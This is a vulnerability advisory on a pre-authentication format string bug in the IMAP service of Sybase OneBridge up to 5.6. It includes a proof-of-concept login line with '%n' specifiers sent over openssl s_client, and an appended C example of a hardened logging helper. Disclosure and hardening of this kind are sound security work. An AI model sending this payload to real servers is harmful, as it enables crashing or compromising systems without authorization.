#######################################################################

                             Luigi Auriemma

Application:  Sybase OneBridge Mobile Data Suite
              http://www.sybase.com/products/allproductsa-z/onebridge
Versions:     <= 5.6
Platforms:    Windows
Bug:          format string in SMTP and IMAP services (ECTrace.dll)
Exploitation: remote, versus server
Date:         probably found 02 Nov 2010
Author:       Luigi Auriemma
              e-mail: aluigi@autistici.org
              web:    aluigi.org


#######################################################################


1) Introduction
2) Bug
3) The Code
4) Fix


#######################################################################

===============
1) Introduction
===============


???


#######################################################################

======
2) Bug
======


The SMTP and IMAP services (iMailGatewayService) listening on the SSL
ports 587 and 993 are affected by a format string vulnerability located
in ECTrace.dll that calls _vsnwprintf without a format argument:

  _vsnwprintf(buffer, 3071, log_string);

where "log_string" can be
"[IMAPService.OnAuthenticateUser] (User=%s%s%n%s%s%n%s%s%n)" if the
vulnerability is exploited in pre-auth by supplying a malformed
username to the IMAP service.

The vulnerable dll is used by both the SMTP and IMAP services; anyway,
I found only the second one vulnerable in pre-auth (SMTP requires login
too).


#######################################################################

===========
3) The Code
===========


  openssl s_client -connect SERVER:993

then type:

  A001 login %s%s%n%s%s%n%s%s%n mypass


#######################################################################

======
4) Fix
======


http://www.zerodayinitiative.com/advisories/ZDI-11-171


#######################################################################
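
Added example, not part of the original advisory and not the vendor's code: a trace helper that avoids the pattern described in section 2 by keeping the format a literal and passing the client's user name only as an argument, plus a small check for flagging user names that carry conversion specifiers. The names trace_fmt, trace_auth_user and count_conversions are hypothetical, and standard vswprintf is assumed here in place of the MSVC-specific _vsnwprintf.

```c
#include <stdarg.h>
#include <stdio.h>
#include <wchar.h>

/* Shape reported in the advisory (kept as a comment, not compiled):
 *     _vsnwprintf(buffer, 3071, log_string);
 * log_string already embeds the client's user name, so a '%' in that
 * name is parsed as a conversion specifier. */

/* Hardened helper (hypothetical name): fmt is always a literal chosen by
 * the caller; untrusted text is only ever passed as an argument. */
int trace_fmt(wchar_t *out, size_t cap, const wchar_t *fmt, ...)
{
    va_list ap;
    int n;
    if (cap == 0) return -1;
    va_start(ap, fmt);
    n = vswprintf(out, cap, fmt, ap);
    va_end(ap);
    if (n < 0) out[0] = L'\0';   /* overflow or encoding error: drop the line */
    return n;
}

/* Log the pre-auth IMAP user name as data, never as part of the format. */
int trace_auth_user(wchar_t *out, size_t cap, const wchar_t *user)
{
    return trace_fmt(out, cap, L"[IMAPService.OnAuthenticateUser] (User=%ls)", user);
}

/* Count conversion specifiers in a string; "%%" is a literal percent.
 * A non-zero count for a user name is worth an alert during log review. */
size_t count_conversions(const wchar_t *s)
{
    size_t n = 0;
    for (; *s; s++) {
        if (*s != L'%') continue;
        if (s[1] == L'%') { s++; continue; }
        if (s[1] != L'\0') n++;
    }
    return n;
}

int main(void)
{
    wchar_t line[3072];
    trace_auth_user(line, 3072, L"%s%s%n%s%s%n%s%s%n"); /* user name from the advisory */
    wprintf(L"%ls\n", line);
    return 0;
}
```

With the literal format, the user name from section 3 is written to the trace line verbatim and none of its specifiers is interpreted.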